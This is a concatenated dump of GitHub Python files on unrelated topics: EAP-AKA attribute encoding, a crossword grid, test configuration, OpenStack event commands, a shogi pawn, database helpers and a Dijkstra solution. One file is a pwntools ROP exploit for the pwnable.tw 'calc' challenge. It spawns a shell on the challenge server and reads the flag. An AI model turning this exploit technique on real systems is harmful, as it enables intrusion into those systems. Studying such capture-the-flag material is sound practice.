Indicates the particular type of attribute. The attribute type\n values are listed in Section 11.\n\n Length\n\n Indicates the length of this attribute in multiples of 4 bytes.\n The maximum length of an attribute is 1024 bytes. The length\n includes the Attribute Type and Length bytes.\n\n Value\n\n The particular data associated with this attribute. This field\n is always included and it is two or more bytes in length. The\n type and length fields determine the format and length of the\n value field.\n \"\"\"\n\n _attribute_code: int\n _attribute_type: AttributeType\n length: int\n value: bytes\n raw: bytes\n\n def __init__(\n self,\n code: Union[AttributeType, int],\n value: bytes,\n raw: Union[bytes, None] = None,\n ):\n if type(code) == AttributeType:\n self._attribute_code = code.value\n self._attribute_type = code\n else:\n self._attribute_code = code\n try:\n self._attribute_type = AttributeType(code)\n except ValueError:\n self._attribute_type = AttributeType.UNKNOWN\n\n self.length = int((len(value) + 2) / 4)\n self.value = value\n\n if raw is None:\n raw = self.encode()\n self.raw = raw\n\n def encode(self) -> bytes:\n \"\"\"\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n |Attribute Type | Length | Value...\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n \"\"\"\n return self.attribute_type.value.to_bytes(1, ordering.BIG) + self.length.to_bytes(1, ordering.BIG) + self.value\n\n @property\n def byte_count(self) -> int:\n return len(self.value) + 2\n\n @property\n def attribute_code(self) -> int:\n return self._attribute_code\n\n @property\n def attribute_type(self) -> AttributeType:\n return self._attribute_type\n\n @attribute_code.setter\n def attribute_code(self, value: int):\n self._attribute_code = value\n try:\n self._attribute_type = AttributeType(value)\n except ValueError:\n self._attribute_type = AttributeType.UNKNOWN\n\n @attribute_type.setter\n def attribute_type(self, value: AttributeType):\n self._attribute_code = value.value\n self._attribute_type = value\n\n @classmethod\n def decode(cls, payload: bytes):\n attribute_code = int(payload[0])\n length = int(payload[1]) * 4\n offset = 2\n value = payload[offset : offset + length]\n return Attribute(attribute_code, value, raw=payload)\n\n def __str__(self) -> str:\n return (\n f\"{self.__class__.__name__}(type={self._attribute_type.name}, \"\n f\"code={self._attribute_code}, length={self.length}, value={self.value})\"\n )\n\n def verbose_str(self) -> str:\n return (\n f\"{self.__class__.__name__}(type={self._attribute_type.name}, \"\n f\"code={self._attribute_code}, length={self.length}, value={self.value}, bytes={self.raw})\"\n )\n\n\n@dataclass\nclass RandAttribute(Attribute):\n \"\"\"\n AT_RAND: https://datatracker.ietf.org/doc/html/rfc4187#section-10.6\n\n rand: 16 bytes (128 bits)\n \"\"\"\n\n rand: bytes\n\n def __init__(self, rand: bytes):\n value = b\"\\0\" * 2 + rand\n super().__init__(AttributeType.AT_RAND, value)\n self.rand = rand\n\n\n@dataclass\nclass AutnAttribute(Attribute):\n \"\"\"\n AT_AUTN: https://datatracker.ietf.org/doc/html/rfc4187#section-10.7\n\n autn: 16 bytes (128 bits)\n \"\"\"\n\n autn: bytes\n\n def __init__(self, autn: bytes):\n value = b\"\\0\" * 2 + autn\n super().__init__(AttributeType.AT_AUTN, value)\n self.autn = autn\n\n\n@dataclass\nclass ResAttribute(Attribute):\n \"\"\"\n AT_RES: https://datatracker.ietf.org/doc/html/rfc4187#section-10.8\n\n res_length: exact length of res in bits\n res: can vary between 32 and 128 bits and must be a multiple of 4 bytes\n \"\"\"\n\n res_length: int\n res: bytes\n\n def __init__(self, res: bytes):\n res_length = len(res) * 8\n value = res_length.to_bytes(2, ordering.BIG) + res\n super().__init__(AttributeType.AT_RES, value)\n self.res_length = res_length\n self.res = res\n\n\n@dataclass\nclass MacAttribute(Attribute):\n \"\"\"\n AT_MAC: https://datatracker.ietf.org/doc/html/rfc4187#section-10.15\n\n mac: 16 bytes (128 bits)\n \"\"\"\n\n _mac: bytes\n\n def __init__(self, mac: bytes = b\"\\0\" * 16):\n value = b\"\\0\" * 2 + mac # 2 reserved bytes + 16 bytes for MAC\n super().__init__(AttributeType.AT_MAC, value)\n self._mac = mac\n\n def sign(self, key: bytes, message: bytes):\n digester = hmac.new(key, message, hashlib.sha1)\n signature = digester.digest()\n self.mac = signature[:16]\n self.raw = self.encode()\n\n @property\n def mac(self) -> bytes:\n return self._mac\n\n def is_set(self) -> bool:\n return self._mac != b\"\\0\" * 16\n\n @mac.setter\n def mac(self, val: bytes):\n self._mac = val\n self.value = b\"\\0\" * 2 + val\n\n def clear(self):\n self.mac = b\"\\0\" * 16\n\n\ndef decode_attribute(payload: bytes):\n attribute = Attribute.decode(payload)\n\n if attribute.attribute_type == AttributeType.AT_RAND:\n attribute.__class__ = RandAttribute\n attribute.rand = attribute.value[2:]\n elif attribute.attribute_type == AttributeType.AT_AUTN:\n attribute.__class__ = AutnAttribute\n attribute.autn = attribute.value[2:]\n elif attribute.attribute_type == AttributeType.AT_RES:\n attribute.__class__ = ResAttribute\n attribute.res_length = int.from_bytes(attribute.value[0:2], ordering.BIG)\n attribute.res = attribute.value[2:]\n elif attribute.attribute_type == AttributeType.AT_MAC:\n attribute.__class__ = MacAttribute\n attribute.mac = attribute.value[2:]\n\n return attribute\n","repo_name":"NetLync/eap-aka-sample-code","sub_path":"attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13915650349","text":"from __future__ import print_function\nfrom enum import Enum\nfrom bartez.entry import Entry, Coordinate, Orientation, Relation\n\n\nclass SquareValues(Enum):\n char = u'.'\n block = u'\\u2588'\n\n\nclass Coordinates(Enum):\n horizontal = 0\n vertical = 1\n\n\nclass Direction(Enum):\n up = 0\n down = 1\n right = 2\n left = 3\n count = 4\n\n\ndef directions_to_index(direction):\n conversion = {\n Direction.up: 0,\n Direction.down: 1,\n Direction.right: 2,\n Direction.left: 3,\n Direction.count: 4\n }\n\n return conversion[direction]\n\n\nclass Square:\n def __init__(self, x=-1, y=-1, value=SquareValues.char):\n count = directions_to_index(Direction.count)\n self.__neighbours = [None for _ in range(count)]\n self.__value = value\n self.__point = [x, y]\n\n def is_block(self):\n return self.__value == SquareValues.block\n\n def set_coordinates(self, coordinates):\n self.__point[0] = coordinates[0]\n self.__point[1] = coordinates[1]\n\n def get_coordinates(self):\n return self.__point[0]\n\n def set_neighbour(self, direction, neighbour):\n self.__neighbours[directions_to_index(direction)] = neighbour\n\n def set_neighbours(self, up, down, left, right):\n self.__neighbours[directions_to_index(Direction.up)] = up\n self.__neighbours[directions_to_index(Direction.down)] = down\n self.__neighbours[directions_to_index(Direction.left)] = left\n self.__neighbours[directions_to_index(Direction.right)] = right\n\n def get_neighbour(self, direction):\n d = directions_to_index(direction)\n return self.__neighbours[d]\n\n def set_value(self, value):\n self.__value = value\n\n def get_value(self):\n return self.__value\n\n def count_squares_to_block(self, direction):\n count = 0\n\n current = self.__neighbours[directions_to_index(direction)]\n\n while current is not None:\n if current.is_block() is True:\n break\n\n count = count + 1\n current = current.get_neighbour(direction)\n\n return count\n\n\nclass Crossworld:\n def __init__(self, rows=0, columns=0):\n self.__rows = 0\n self.__columns = 0\n self.__grid = []\n self.__entries = []\n self.__intersections = []\n self.set_geometry(rows, columns)\n\n def set_geometry(self, rows, columns):\n self.__rows = rows\n self.__columns = columns\n self.__grid = [[Square() for _ in range(columns)] for _ in range(rows)]\n\n def set_value(self, row, column, value):\n # print \"row: \", row, \" column: \", column, \" value: \", value\n if row >= self.__rows or column >= self.__columns:\n return\n\n self.__grid[row][column] = Square(row, column, value)\n\n def set_value_from_entry(self, entry):\n for i, char in enumerate(list(entry.value())):\n row = entry.x() if entry.horizontal() else entry.x() + i\n col = entry.y() + i if entry.horizontal() else entry.y()\n self.__grid[row][col].set_value(char)\n return\n\n def get_value(self, row, column):\n return self.__grid[row][column].get_value()\n\n def set_blocks(self, blocks):\n for block in blocks:\n r = block[0]\n c = block[1]\n\n if c >= self.__columns:\n continue\n\n if r >= self.__rows:\n continue\n\n self.__grid[r][c].set_value(Square(r, c, SquareValues.block))\n\n def set_entries(self, entries):\n self.__entries = entries\n\n for entry in entries:\n value = entry.get_value()\n if str('.') in value:\n continue\n self.set_value_from_entry(entry)\n\n def get_entries(self):\n return self.__entries\n\n def clear_all_non_blocks(self):\n for square_column in self.__grid:\n for square in square_column:\n if square.is_block() is False:\n square.set_value(SquareValues.char)\n\n def print_crossword(self):\n print('')\n\n for r in range(0, self.__rows):\n for c in range(0, self.__columns):\n char = self.__grid[r][c].get_value()\n if char == SquareValues.block:\n \"\"\"\n @todo replace unicode value, now it produces codec ascii error\n print('\\u2588', end=' '),\n \"\"\"\n print('#', end=' '),\n elif char == SquareValues.char:\n print(u'.', end=' '),\n else:\n print(char, end=' '),\n\n print('')\n\n print('')\n\n def __update_neighbours(self):\n for r in range(0, self.__rows):\n for c in range(0, self.__columns):\n square = self.__grid[r][c]\n up, down, right, left = None, None, None, None\n\n if (r > 0) and (r < self.__rows):\n up = self.__grid[r-1][c]\n\n if (c >= 0) and (c < self.__columns - 1):\n right = self.__grid[r][c+1]\n\n if (r >= 0) and (r < self.__rows - 1):\n down = self.__grid[r+1][c]\n\n if (c > 0) and (c < self.__columns):\n left = self.__grid[r][c-1]\n\n square.set_neighbours(up, down, left, right)\n\n def __update_entries(self):\n entries_count = 0\n for r in range(0, self.__rows):\n for c in range(0, self.__columns):\n square = self.__grid[r][c]\n\n if square.is_block():\n continue\n\n up = square.count_squares_to_block(Direction.up)\n right = square.count_squares_to_block(Direction.right)\n down = square.count_squares_to_block(Direction.down)\n left = square.count_squares_to_block(Direction.left)\n\n is_vertical = (up == 0) and (down >= 1)\n is_horizontal = (left == 0) and (right >= 1)\n\n if is_horizontal is False and is_vertical is False:\n continue\n\n entries_count += 1\n\n if is_horizontal is True:\n coordinate = Coordinate(r, c)\n orientation = Orientation.horizontal\n length = right + 1\n number = entries_count\n entry = Entry(coordinate, orientation, number, length)\n entry.set_description(str(number) + \" Horizontal\")\n self.__entries.append(entry)\n\n if is_vertical is True:\n coordinate = Coordinate(r, c)\n orientation = Orientation.vertical\n length = down + 1\n number = entries_count\n entry = Entry(coordinate, orientation, number, length)\n entry.set_description(str(number) + \" Vertical\")\n self.__entries.append(entry)\n\n return len(self.__entries)\n\n @staticmethod\n def __get_entry_domain(entry):\n if entry.horizontal():\n entry_domain = [Coordinate(entry.x(), entry.y() + i) for i in range(entry.length())]\n else:\n entry_domain = [Coordinate(entry.x() + i, entry.y()) for i in range(entry.length())]\n return entry_domain\n\n def __update_entries_relations(self):\n entries_count = len(self.__entries)\n intersection_matrix = [[-1 for _ in range(entries_count)] for _ in range(entries_count)]\n\n for index_entry, entry in enumerate(self.__entries, start=0):\n entry.remove_all_relations()\n entry_domain = self.__get_entry_domain(entry)\n\n for index_other, other in enumerate(self.__entries, start=0):\n if entry == other:\n continue\n\n if entry.get_orientation() == other.get_orientation():\n continue\n\n other_domain = self.__get_entry_domain(other)\n\n intersection = []\n for coordinate_e in entry_domain:\n for coordinate_o in other_domain:\n if coordinate_e.x() == coordinate_o.x() and coordinate_e.y() == coordinate_o.y():\n intersection.append(coordinate_e)\n\n if len(intersection) is 0:\n continue\n\n assert(len(intersection) is 1)\n\n coordinate = intersection[0]\n pos_in_entry = coordinate.x() - entry.x() if entry.horizontal() else coordinate.y() - entry.y()\n pos_in_other = coordinate.x() - other.x() if other.horizontal() else coordinate.y() - other.y()\n intersection_matrix[pos_in_entry][pos_in_other] = pos_in_entry\n relation = Relation(index_other, coordinate)\n entry.add_relation(relation)\n\n self.__intersections = intersection_matrix\n return\n\n def get_intersection_matrix(self):\n return self.__intersections\n\n def __get_intersection(self, index_entry, index_other):\n return self.__intersections[index_entry][index_other]\n\n def __print_neighbours(self):\n for r in range(0, self.__rows):\n for c in range(0, self.__columns):\n square = self.__grid[r][c]\n print(\"Square: \", r, \", \", c)\n print(\" up\", square.get_neighbour(Direction.up))\n print(\" right\", square.get_neighbour(Direction.right))\n print(\" down\", square.get_neighbour(Direction.down))\n print(\" left\", square.get_neighbour(Direction.left))\n\n def __print_entries(self):\n for index, entry in enumerate(self.__entries):\n print(index, \": \", entry.get_description())\n return\n\n def __print_entries_relations(self):\n return\n\n def prepare(self):\n self.__update_neighbours()\n self.__update_entries()\n self.__update_entries_relations()\n self.print_info()\n return\n\n def print_info(self):\n #print \"*** Neighbours ***\"\n #self.__print_neighbours()\n\n print(\"*** Entries ***\")\n self.__print_entries()\n\n entries = get_entries\n get_intersection = __get_intersection\n","repo_name":"crsnplusplus/bartez","sub_path":"bartez/crossword.py","file_name":"crossword.py","file_ext":"py","file_size_in_byte":10287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31390751229","text":"import os\n\nDEBUG = False # this guy is a flag for extra messaging while debugging tests\n\n#NOTE: Logger and Platform are initialized in TestRunner's main()\nLogger = None\nPlatform = None\n\n''' Testing paths '''\ncurrentPath = os.path.dirname(__file__) # should go to .\\solutions-geoprocessing-toolbox\\utils\\test\nrepoPath = os.path.dirname(os.path.dirname(currentPath))\n\n''' Log Path: the folder where the log files go wild and multiply '''\nlogPath = os.path.normpath(os.path.join(currentPath, r\"log\")) # should go to .\\solutions-geoprocessing-toolbox\\utils\\test\\log\n\n''' Capability Paths'''\ncapabilityPath = os.path.normpath(os.path.join(currentPath, r\"capability_tests\"))\n\npooURL = r\"http://www.arcgis.com/sharing/content/items/9d8a534a70d54a74911d9ddb60b5a1d9/data\"\n\n''' Data Management Paths '''\ndataManagementPaths = os.path.normpath(os.path.join(currentPath, r\"data_management_tests\"))\ngeonamesURL = r\"http://www.arcgis.com/sharing/content/items/afc766d5276648ab80aa85b819af1ffc/data\"\nnetworkPrepURL = r\"http://www.arcgis.com/sharing/content/items/cf09da3684214d2b9b18c22149130fc4/data\"\npatrolDataCaptureURL = r\"http://www.arcgis.com/sharing/content/items/853736d171e44a40a55e4c312bf43b66/data\"\nimportAndConversionURL = r\"http://www.arcgis.com/sharing/content/items/130f52ac95a040cb80717d99db100409/data\"\npublishableTasksURL = r\"http://www.arcgis.com/sharing/content/items/921fc6d5f5e2444dab14831edc01ef9d/data\"\n\n''' Operational Graphics Paths '''\noperationalGraphicsPaths = os.path.normpath(os.path.join(currentPath, r\"operational_graphics_tests\"))\nclearingOperationsURL = r\"http://www.arcgis.com/sharing/content/items/198f01e263474c209198c9c3c3586287/data\"\nsunPositionAnalysisURL = r\"http://www.arcgis.com/sharing/content/items/bf6a04b4c9a3447b91e9c0b4074ca1e4/data\"\nrangeCardURL = r\"http://www.arcgis.com/sharing/content/items/f5414250daf14dd389cc50199efeef8d/data\"\n\n\n''' Patterns Paths '''\npatternsPaths = os.path.normpath(os.path.join(currentPath, r\"patterns_tests\"))\nincidentDataPath = None\nincidentInputGDB = None\nincidentScratchGDB = None\npatterns_ToolboxesPath = os.path.normpath(os.path.join(currentPath, r\"../../patterns/toolboxes/\"))\npatterns_ProToolboxPath = os.path.normpath(os.path.join(patterns_ToolboxesPath, \"Incident Analysis Tools.tbx\"))\npatterns_DesktopToolboxPath = os.path.normpath(os.path.join(patterns_ToolboxesPath, \"Incident Analysis Tools_10.4.tbx\"))\nincidentURL = \"http://www.arcgis.com/sharing/content/items/528faf6b23154b04a8268b33196fa9ad/data\"\nincidentGDBName = \"test_incident_analysis_tools.gdb\"\n\n''' Suitability Paths '''\nsuitabilityPaths = os.path.normpath(os.path.join(currentPath, r\"suitability_tests\"))\nsuitabilityDataPath = None\nsuitability_ToolboxesPath = os.path.normpath(os.path.join(currentPath, r\"../../suitability/toolboxes/\"))\nmaritimeDataPath = None\nmaritimeScratchGDB = None\nmaow_ToolboxPath = os.path.join(suitability_ToolboxesPath, \"Military Aspects of Weather Tools_10.4.tbx\")\nmaotURL = r\"http://www.arcgis.com/sharing/content/items/127bff2341694342a6df884aaa51237e/data\"\nmaowURL = \"http://www.arcgis.com/sharing/content/items/74eeb356c7dd4422bf52f36f38bb8a9b/data\"\nmaritime_DesktopToolboxPath = os.path.join(suitability_ToolboxesPath, \"Maritime Decision Aid Tools_10.4.tbx\")\nmaritime_ProToolboxPath = os.path.join(suitability_ToolboxesPath, \"Maritime Decision Aid Tools.tbx\")\nmaritimeURL = \"http://www.arcgis.com/sharing/content/items/43fbe3e823614783a391676d47dd3c5f/data\"\nmaritimeGDBName = \"MaritimeDecisionAidToolsTestData\"\npathSlopeURL = r\"http://www.arcgis.com/sharing/content/items/cbb812326b6f4fb2b77cac4a85e734a9/data\"\n\n''' Visibility Paths '''\nvisibilityPaths = os.path.normpath(os.path.join(currentPath, r\"visibility_tests\"))\nvis_ToolboxesPath = os.path.normpath(os.path.join(currentPath, r\"../../visibility/toolboxes/\"))\n\n\n\n","repo_name":"giserh/solutions-geoprocessing-toolbox","sub_path":"utils/test/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"9632543574","text":"from pwn import *\ndef cal(c):\n\tp.sendline(c)\neax=0x0805c34b\nppp=0x080701d0\nint0x80=0x08049a21\nread=0x806E6D0\nbss=0x080ebf40+0x100\n#p=process(\"./calc\")\np=remote(\"chall.pwnable.tw\",10100)\n#gdb.attach(p,'b *0x80494a6')\naim=(0xffffd06c-0xffffcaf8)/4+19\n\ncal(\"+{}+1*{}-1*{}\".format(str(aim),str(read+ppp),str(ppp)))\ncal(\"+{}-1*{}-1*{}-1*{}-1*{}+1*{}-1*{}\".format(str(aim+2),str(bss),str(bss+100),str(100+ppp),str(ppp),str(1),str(1)))\ncal(\"+{}+1*{}-1*{}+1*{}+1*{}-1*{}\".format(str(aim+2+5),str(bss),str(bss-eax),str(eax-0xb),str(0xb+int0x80),str(int0x80)))\n\np.sendline(\"nier\")\np.send(\"/bin/sh\\x00\\n\")\nsleep(3)\np.sendline(\"cat /home/calc/flag\")\np.interactive()\n\n\n","repo_name":"n132/Watermalon","sub_path":"pwnable_tw/calc/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"14248438320","text":"from schematics import Model\nfrom schematics.types import IntType, StringType\n\nfrom yawsm.infrastructure.websocket.request import validate\nfrom yawsm.work.model import ALL_STATUSES\nfrom yawsm.worker.actions.work_is_done.usecase import WorkIsDoneDto\n\n\nclass WorkIsDoneSchema(Model):\n work_id = IntType(required=True)\n status = StringType(\n required=True,\n choices=['KILLED', 'DONE']\n )\n output = StringType()\n exit_code = IntType()\n\n\nclass WorkIsDoneController:\n def __init__(self, usecase):\n self.usecase = usecase\n\n @validate(schema=WorkIsDoneSchema)\n async def handle(self, request):\n dto = WorkIsDoneDto(\n worker_socket=request.peer,\n work_id=request.validated.work_id,\n status=request.validated.status,\n output=request.validated.output,\n exit_code=request.validated.exit_code\n )\n await self.usecase.perform(dto)\n","repo_name":"mwalercz/yawsm","sub_path":"yawsm/worker/actions/work_is_done/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30837334759","text":"import copy\n\nimport json\n\nfrom osc_lib.command import command\nfrom osc_lib import utils\n\n\nclass EventList(command.Lister):\n \"\"\"List events\"\"\"\n\n @staticmethod\n def split_filter_param(param):\n key, eq_op, value = param.partition('=')\n if not eq_op:\n msg = 'Malformed parameter(%s). Use the key=value format.' % param\n raise ValueError(msg)\n return key, value\n\n def get_parser(self, prog_name):\n parser = super(EventList, self).get_parser(prog_name)\n parser.add_argument('--filter', dest='filter',\n metavar='',\n type=self.split_filter_param,\n action='append',\n help='Filter parameters to apply on'\n ' returned events.')\n parser.add_argument(\"--limit\", type=int, metavar=\"\",\n help=\"Number of events to return \"\n \"(Default is server default)\")\n parser.add_argument(\"--marker\", metavar=\"\",\n help=\"Last item of the previous listing. \"\n \"Return the next results after this value,\"\n \"the supported marker is message_id.\")\n parser.add_argument(\"--sort\", action=\"append\",\n metavar=\"\",\n help=\"Sort of events attribute, \"\n \"e.g. name:asc\")\n return parser\n\n def take_action(self, parsed_args):\n ac = self.app.client_manager.event\n filters = dict(parsed_args.filter) if parsed_args.filter else None\n events = ac.event.list(\n filters=filters, sorts=parsed_args.sort,\n limit=parsed_args.limit, marker=parsed_args.marker)\n columns = ('event_type', 'generated', 'message_id', 'traits')\n formatters = {'traits': lambda s: json.dumps(s, indent=4)}\n return (columns,\n (utils.get_item_properties(\n s, columns, formatters=formatters) for s in events))\n\n\nclass EventShow(command.ShowOne):\n \"\"\"List events\"\"\"\n\n def get_parser(self, prog_name):\n parser = super(EventShow, self).get_parser(prog_name)\n parser.add_argument(\n 'message_id',\n metavar='',\n help=\"event of specified message_id to display\"\n )\n return parser\n\n def take_action(self, parsed_args):\n ac = self.app.client_manager.event\n event = ac.event.get(message_id=parsed_args.message_id)\n data = copy.deepcopy(event._info)\n data.update({'traits': json.dumps(data['traits'], indent=4)})\n return self.dict2columns(data)\n","repo_name":"liusheng/python-pankoclient","sub_path":"pankoclient/osc/v2/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28758104806","text":"from __future__ import unicode_literals\nimport mariadb\nimport json\nfrom pathlib import Path\nclass DbManager:\n def __init__(self):\n #load config\n path = Path(__file__).parent.absolute()\n configpath = '{}/config.json'.format(path)\n with open(configpath) as file:\n config = json.load(file)\n\n self.dbcon = mariadb.connect(\n host=config['host'],\n user=config['user'],\n password=config['password'],\n database=config['database'],\n )\n \n #\n # save list to database\n #\n def insertListToDB(self,url_list):\n mycursor = self.dbcon.cursor()\n query = \"INSERT IGNORE INTO video_list(url_id,title) values(%(id)s,%(title)s)\"\n # query = \"INSERT IGNORE INTO video_list set url_id=%(id)s, title=%(title)s\"\n\n list = url_list\n count = 0\n for i, item in enumerate(list):\n if list is not None:\n urlBasename = list[i]['id'] if list is not None else None\n print('checking ', urlBasename)\n val = (list[i])\n mycursor.execute(query,val)\n self.dbcon.commit()\n if mycursor.rowcount > 0:\n print(urlBasename,' inserted')\n count+=1\n # else:\n # print('no data, skipped')\n \n print(count, \" new record inserted.\")\n\n #\n # Get video list from db which hasnt been downloaded yet\n #\n def getListUndownloadFromDB(self):\n mycursor = self.dbcon.cursor(dictionary=True)\n query = \"select * from video_list where is_downloaded = 0\"\n mycursor.execute(query)\n myresult = mycursor.fetchall()\n \n return myresult\n\n #\n # update is_downloaded\n #\n def updateDownloadedToDB(self,current_download_url_id):\n mycursor = self.dbcon.cursor()\n url_id = current_download_url_id\n query = \"UPDATE video_list set is_downloaded=1 where url_id=%s\"\n val=([url_id])\n mycursor.execute(query,val)\n self.dbcon.commit()\n print(mycursor.rowcount, \"record updated.\")","repo_name":"akzn/youtube-playlist-manager","sub_path":"dbmanager.py","file_name":"dbmanager.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69917705690","text":"from .Pieces import *\n\n#Classe Pion herite de la classe Piece\nclass Pion(Pieces): \n\n #On appel le constructeur de Piece\n ###Rajouter pionMouvement dans le constructeur ?\n def __init__(self, square, image, cote, type, row, col):\n super().__init__(square, image, cote, type, row, col)\n\n #Methode concernant la liste des mouvements possibles pour la piece (ici le pion)\n #On vient reinitialiser les mouvements de la piece en question a son acquisition\n #Puis en fonction du cote du terrain (Regnant ou Opposant) alors on definit son sens de deplacement\n ###La methode peut completement etre simplifie (pour plus tard)\n def getAvailableMoves(self, row, col, Board):\n self.clearAvailableMoves()\n\n pionMouvement = 0;\n\n if self.cote == Joueur.Regnant: #Si Regnant alors joueur est en bas du plateau\n\n pionMouvement = -1\n\n if row + pionMouvement >= 0: #Si le pion peut avancer (pas au bord du plateau) alors :\n if Board[row + pionMouvement][col] == 0: #S il n y a pas de piece devant le pion\n self.availableMoves.append((row + pionMouvement, col)) #Il peut avancer\n else:\n piece = Board[row + pionMouvement][col]\n if piece.cote != self.cote: #Sinon, si la piece est une piece ennemie\n self.availableMoves.append((row + pionMouvement, col)) #Il peut avancer\n \n if self.cote == Joueur.Opposant: #Si Opposant alors en haut du plateau\n\n pionMouvement = 1\n\n if row + pionMouvement < len(Board): \n if Board[row + pionMouvement][col] == 0: \n self.availableMoves.append((row + pionMouvement, col)) \n else:\n piece = Board[row + pionMouvement][col]\n if piece.cote != self.cote: \n self.availableMoves.append((row + pionMouvement, col))\n\n return self.availableMoves","repo_name":"enzo1000/Shogi","sub_path":"Shogi/Shogi/src/pieces/Pion.py","file_name":"Pion.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38207243427","text":"import sqlite3\nfrom random import randint\nfrom queue import Queue\nfrom threading import Event, Thread\n\n\nalph = \"abcdef\"\nMAIN_TB = \"MAIN_TABLE\"\n\n\nclass DB_Manager:\n def __init__(self):\n self.db_dir = \"serv.db\"\n self.connection = sqlite3.connect(self.db_dir, check_same_thread=False)\n self.to_drop = False\n #! delete /\n def setup(self): # ?None<-- -->None\n cursor = self.connection.cursor()\n try:\n if self.to_drop:\n print(\"dropping main table \")\n cursor.execute('''DROP TABLE MAIN_TABLE''')\n cursor.execute('''CREATE TABLE MAIN_TABLE\n (\n user_id INTEGER PRIMARY KEY AUTOINCREMENT,\n account_name TEXT,\n is_online INTEGER\n )''')\n except:\n pass\n self.connection.commit()\n # self.test_fill()\n self.get_tbl(\"MAIN_TABLE\")\n del cursor\n return None\n #! delete /\n def create_main_table(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute('''CREATE TABLE MAIN_TABLE\n (\n user_id INTEGER PRIMARY KEY AUTOINCREMENT,\n account_name TEXT,\n is_online INTEGER\n )''')\n self.connection.commit()\n except:\n print(\"Main table already created\")\n \n return None \n def delete_users(self):\n self.drop_tbl(\"MAIN_TABLE\")\n self.create_main_table()\n self.connection.commit()\n return None\n\n def get_tbl(self, table): # ? None<-- --> None\n cursor = self.connection.cursor()\n for row in cursor.execute('''SELECT * FROM {}'''.format(table)):\n print(row)\n del cursor\n return None\n\n def update_value(self, table, account_name, column, value): # ? None<-- -->None\n cursor = self.connection.cursor()\n cursor.execute(\n 'UPDATE {} SET {}={} WHERE account_name==?'.format(table, column, value), account_name)\n self.connection.commit()\n del cursor\n return None\n\n def is_existent(self, account_name): # ? string<-- --> bool\n cursor = self.connection.cursor()\n value = cursor.execute(\n 'SELECT is_online from MAIN_TABLE WHERE account_name==?', (account_name,))\n self.connection.commit()\n del cursor\n if value.fetchall() == []:\n return False\n else:\n return True\n\n def disconnect_all(self):\n cursor = self.connection.cursor()\n table = \"MAIN_TABLE\"\n column = \"is_online\"\n value = 0\n cursor.execute('UPDATE {} SET {}={} '.format(table, column, value))\n self.connection.commit()\n return None\n\n def disconnect_user(self, account_name): # ?(string)->None\n self.update_value(MAIN_TB, account_name, \"is_online\", 0)\n return None\n\n def connect_user(self, account_name):\n self.update_value(MAIN_TB, account_name, \"is_online\", 1)\n return None\n\n def append_client(self, account_name):\n cursor = self.connection.cursor()\n is_online = 1 # * if user has signed up, then he is online\n cursor.execute('''INSERT INTO {}(account_name,is_online) VALUES (?,?)'''.format(\n \"MAIN_TABLE\"), (account_name, 1))\n return None\n\n def is_online(self, account_name): # ? string<-- -->bool\n cursor = self.connection.cursor()\n for row in cursor.execute('SELECT is_online from MAIN_TABLE WHERE account_name==?', account_name):\n \n is_online = row[0]\n if is_online:\n return True\n else:\n return False\n self.connection.commit()\n del cursor\n return None\n\n def drop_tbl(self, table): # ?(string)->None\n cursor = self.connection.cursor()\n cursor.execute(\"DROP TABLE {};\".format(table))\n self.connection.commit()\n return None","repo_name":"grishchenkoalexey2004/QuickText-Messenger","sub_path":"server_db.py","file_name":"server_db.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3225523095","text":"import heapq\r\nimport sys\r\n\r\ninput = sys.stdin.readline\r\n\r\nMAX = int(1e9)\r\nN = int(input())\r\nM = int(input())\r\ngraph = [[] for _ in range(N + 1)]\r\ndistance = [MAX] * (N + 1)\r\nvias = [0] * (N + 1)\r\n\r\nfor _ in range(M):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((b, c))\r\n\r\nstart, end = map(int, input().split())\r\n\r\n\r\ndef djikstra(start):\r\n queue = []\r\n heapq.heappush(queue, (0, start))\r\n distance[start] = 0\r\n while queue:\r\n dist, now = heapq.heappop(queue)\r\n if distance[now] < dist:\r\n continue\r\n for line in graph[now]:\r\n if dist + line[1] < distance[line[0]]:\r\n distance[line[0]] = dist + line[1]\r\n vias[line[0]] = now\r\n heapq.heappush(queue, (dist + line[1], line[0]))\r\n\r\n\r\ndjikstra(start)\r\nprint(distance[end])\r\nanswer = [end]\r\ntemp = end\r\nwhile 1:\r\n if temp == start:\r\n break\r\n answer.append(vias[temp])\r\n temp = vias[temp]\r\nprint(len(answer))\r\nanswer.reverse()\r\nprint(*answer)\r\n","repo_name":"jjun990908/Algorithm","sub_path":"백준/Gold/11779. 최소비용 구하기 2/최소비용 구하기 2.py","file_name":"최소비용 구하기 2.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} 